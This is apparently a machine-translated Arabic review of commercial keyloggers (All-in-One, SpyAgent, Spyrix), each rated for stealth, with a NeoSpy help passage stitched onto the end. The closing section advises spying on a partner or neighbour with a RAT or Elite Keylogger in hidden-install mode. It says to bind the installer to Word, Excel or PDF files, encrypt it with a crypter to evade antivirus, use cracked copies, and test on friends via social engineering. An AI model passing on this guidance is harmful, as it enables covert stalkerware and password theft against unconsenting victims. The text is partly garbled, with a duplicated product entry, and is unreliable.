لا يوجد وضع تشغيل للشبكة، وبالتالي فهو غير مناسب للاستخدام من قبل أصحاب العمل (لمراقبة أجهزة الكمبيوتر الخاصة بموظفيهم) أو مجموعة كاملة من الأشخاص.

النقطة المهمة هي القدرة على إنشاء توزيع تثبيت بإعدادات محددة مسبقًا (على سبيل المثال، باستخدام عنوان بريد إلكتروني محدد حيث يجب إرسال السجلات). في الوقت نفسه، في النهاية، تحصل على مجموعة توزيع، عند إطلاقها، لا تعرض أي تحذيرات أو نوافذ على الإطلاق، وبعد التثبيت يمكن أن تدمر نفسها (إذا قمت بتحديد الخيار المناسب).

عدة لقطات شاشة للإصدار 5 (لإظهار مدى جمال كل شيء وملاءمته):

2. كلوغر الكل في واحد.

التقييمات (من 10):

  • الخفي: 3
  • الراحة/سهولة الاستخدام: 9
  • الوظيفة: 8

إنه أيضًا شيء مريح جدًا. الوظيفة على مستوى Elite keylogger. الأمور أسوأ مع السرية. لم يعد يتم اعتراض كلمات مرور Winlogon، فهي ليست برنامج تشغيل وليست مدمجة في النواة. ومع ذلك، يتم تثبيته في النظام وأدلة AppData المخفية، والتي لا يمكن الوصول إليها بسهولة للمستخدمين غير المصرح لهم (وليس أولئك الذين تم تثبيته نيابةً عنهم). ومع ذلك، فإن برامج مكافحة الفيروسات تنجح عاجلاً أم آجلاً في القيام بذلك، مما يجعل هذا الشيء غير موثوق وآمن بشكل خاص عند استخدامه، على سبيل المثال، في العمل للتجسس على رؤسائك. ؛) لن ينجح لصقه بشيء ما أو تشفير الكود لإخفائه من برامج مكافحة الفيروسات.

يعمل على أي إصدار من نظام التشغيل Win OS (وهو أمر جميل وعملي).

أما بالنسبة للباقي، فكل شيء على ما يرام: فهو يسجل كل شيء (باستثناء كلمات مرور تسجيل الدخول إلى Windows)، ويرسله إلى أي مكان (بما في ذلك البريد الإلكتروني وبروتوكول نقل الملفات ومحرك الأقراص المحمول الثابت). من حيث الراحة، كل شيء ممتاز أيضًا.

3. Spytech SpyAgent.

التقييمات (من 10):

  • الخفي: 4
  • الراحة/سهولة الاستخدام: 8
  • الوظيفة: 10

وهو أيضًا برنامج Keylogger جيد، على الرغم من أنه يتمتع بسرية مشكوك فيها. إصدارات نظام التشغيل المدعومة كلها ممكنة أيضًا. الوظيفة مشابهة للخيارات السابقة. هناك وظيفة التدمير الذاتي المثيرة للاهتمام بعد فترة زمنية محددة (أو عند الوصول إلى تاريخ محدد مسبقًا).

بالإضافة إلى ذلك، من الممكن تسجيل الفيديو من كاميرا الويب والصوت من الميكروفون، والذي يمكن أيضًا أن يحظى بشعبية كبيرة والذي لا يمتلكه الممثلان السابقان.

يوجد وضع تشغيل للشبكة، وهو مناسب لمراقبة شبكة كاملة من أجهزة الكمبيوتر. بالمناسبة، StaffCop لديه (لم يتم تضمينه في المراجعة بسبب عدم فائدته لمستخدم واحد - فرد). ربما يكون هذا البرنامج مثاليًا لأصحاب العمل للتجسس على موظفيهم (على الرغم من أن القادة في هذا المجال هم StaffCop وLanAgent دون قيد أو شرط - إذا كنت كيانًا قانونيًا، فتأكد من النظر في اتجاههم). أو لتتبع أبنائك الذين يحبون الجلوس ومشاهدة "مواقع الكبار". أولئك. حيث أن المطلوب ليس الإخفاء، بل الراحة (بما في ذلك مجموعة من تقارير السجل الجميلة، وما إلى ذلك) والوظيفة لحظر مواقع/برامج محددة (يحتوي SpyAgent أيضًا على ذلك).

4. شاشة Spyrix الشخصية.

التقييمات (من 10):

  • الخفي: 4
  • الراحة/سهولة الاستخدام: 6
  • الوظيفة: 10

الوظيفة على مستوى المرشح السابق، ولكن نفس المشاكل مع السرية. بالإضافة إلى ذلك، تتضمن الوظيفة شيئًا مثيرًا للاهتمام: نسخ الملفات من محركات أقراص USB المُدرجة في الكمبيوتر، بالإضافة إلى عرض السجلات عن بعد من خلال حساب ويب على موقع Spyrix (لكننا سنقوم بتنزيل نسخة متصدعة، لذلك لن يتم ذلك) العمل بالنسبة لنا).

5. شاشة Spyrix الشخصية.

التقييمات (من 10):

  • الخفي: 3
  • الراحة/سهولة الاستخدام: 6
  • الوظيفة: 8

لن أصفها بالتفصيل، لأن... لا تحتوي هذه الحالة على أي شيء لم يكن لدى أحد الجواسيس السابقين، ومع ذلك، قد يحب شخص ما برنامج Keylogger هذا (على الأقل بالنسبة لواجهته).

ماذا ننتهي به؟

إن مسألة استخدام برنامج Keylogger هي مسألة أخلاقية أكثر منها تقنية، وتعتمد إلى حد كبير على أهدافك.

إذا كنت صاحب عمل يريد التحكم في موظفيه، فلا تتردد في إعداد StaffCop، والحصول على إذن كتابي من جميع الموظفين لمثل هذه الإجراءات (وإلا قد يتم فرض رسوم عليك بشدة مقابل مثل هذه الأشياء) وستكون الوظيفة في متناول اليد. على الرغم من أنني شخصيا أعرف طرقا أكثر فعالية لزيادة أداء الموظفين لدي.

إذا كنت متخصصًا مبتدئًا في تكنولوجيا المعلومات وترغب فقط في تجربة ما يعنيه كسر شخص ما - وكيف يعمل هذا الشيء بشكل عام، فقم بتسليح نفسك بأساليب الهندسة الاجتماعية وقم بإجراء الاختبارات على أصدقائك باستخدام أي من الأمثلة المقدمة. ومع ذلك، تذكر: اكتشاف الضحايا لمثل هذا النشاط لا يساهم في الصداقة وطول العمر. ؛) وبالتأكيد لا ينبغي عليك اختبار ذلك في عملك. تذكروا كلامي: لدي خبرة في هذا. ;)

إذا كان هدفك هو التجسس على صديقك، أو زوجك، أو جارك، أو ربما تفعل ذلك بانتظام ومن أجل المال، ففكر جيدًا فيما إذا كان الأمر يستحق ذلك. بعد كل شيء، عاجلا أم آجلا قد ينجذبون. ولا يستحق الأمر ذلك: "إن البحث في الغسيل القذر لشخص آخر ليس متعة ممتعة". إذا كنت لا تزال بحاجة إلى ذلك (أو ربما تعمل في مجال التحقيق في جرائم الكمبيوتر ومثل هذه المهام جزء من مسؤولياتك المهنية)، فليس هناك سوى خيارين: الجرذ! والنخبة كيلوغر. في وضع التوزيعات التثبيت المخفية، لصقها مع كلمة / اكسل / قوات الدفاع الشعبي. ومن الأفضل، إن أمكن، أن يتم تشفيرها باستخدام برنامج تشفير جديد. في هذه الحالة فقط يمكننا ضمان أنشطة أكثر أمانًا ونجاحًا حقيقيًا.

ولكن على أي حال، تجدر الإشارة إلى أن الاستخدام الكفء لبرنامج Keyloggers ليس سوى رابط صغير لتحقيق الهدف (بما في ذلك حتى الهجوم البسيط). ليس لديك دائمًا حقوق المسؤول، وليس لديك دائمًا حق الوصول الفعلي، ولن يتمكن جميع المستخدمين من الفتح والقراءة، بل وأكثر من ذلك، قم بتنزيل المرفقات/الروابط الخاصة بك (مرحبًا بالهندسة الاجتماعية)، ولن يتم تعطيل برنامج مكافحة الفيروسات دائمًا لن يكون /keylogger/cryptor الخاص بك دائمًا غير معروف لهم. كل هذه المشاكل والعديد من المشاكل التي لا توصف يمكن حلها، ولكن حلها هو موضوع سلسلة كاملة من المقالات المنفصلة.

باختصار، لقد بدأت للتو في الغوص في عالم أمن المعلومات المعقد والخطير والمثير للاهتمام بشكل لا يصدق. :)

بإخلاص،ليسياك أ.س.

كلوغرهو برنامج يقرأ المفاتيح المضغوطة ويحفظها في ملف. في المستقبل، يمكنك عرض ما كتبه الشخص على الكمبيوتر، وما هي الرسائل التي كتبها وما هي كلمات المرور التي أدخلها. الاسم الآخر لبرنامج Keylogger هو Keylogger، وهو مشتق من الكلمة الإنجليزية "keylogger"، والتي تعني حرفيًا "أزرار التسجيل".

في برنامج NeoSpy، يتم تمكين وظيفة keylogger افتراضيًا؛ وفي هذا الوضع، يقوم البرنامج بتسجيل النص ومجموعات مفاتيح التشغيل السريع وكلمات المرور المكتوبة على لوحة المفاتيح. توجد إدارة إعدادات keylogger في قائمة "إعدادات التتبع" - "تسجيل السجل" - "لوحة المفاتيح". يمكنك اختيار أحد وضعي تشغيل البرنامج: القياسي والبديل. يوصى باستخدام الخيار القياسي بنسبة 99% من الوقت، ولكن إذا كان هناك تعارض مع برنامج مكافحة الفيروسات لديك، فيمكنك تمكين الوضع البديل.

إعداد برنامج Keylogger


يتم دائمًا تسجيل سجل لوحة المفاتيح بالتنسيق الكامل، بما في ذلك مفاتيح الخدمة. يمكن رؤية مثال على هذا السجل في الرسم التوضيحي. عند عرض التقرير، يمكنك تعطيل عرض الأحرف غير القابلة للطباعة وعرض السجل كنص بسيط، يسهل الوصول إليه للقراءة المجانية.


مثال على كلوغر

لتسهيل العمل مع التقارير، يتم تمييز كلمات المرور المكتوبة في قائمة ضغطات المفاتيح. بهذه الطريقة يمكنك معرفة كلمات المرور الخاصة بطفلك، وإذا لزم الأمر، حمايته من المعارف غير المرغوب فيهم. إذا تم استخدام برنامج NeoSpy في مؤسسة لمراقبة الموظفين، فإن جمع البيانات الشخصية والمراسلات محظور بموجب تشريعات معظم البلدان، لذا يجب تعطيل هذا الخيار، أو يجب إخطار الموظف كتابيًا بالتحكم من قبل الإدارة و عدم جواز استخدام الحاسوب في المنظمة للمراسلات الشخصية.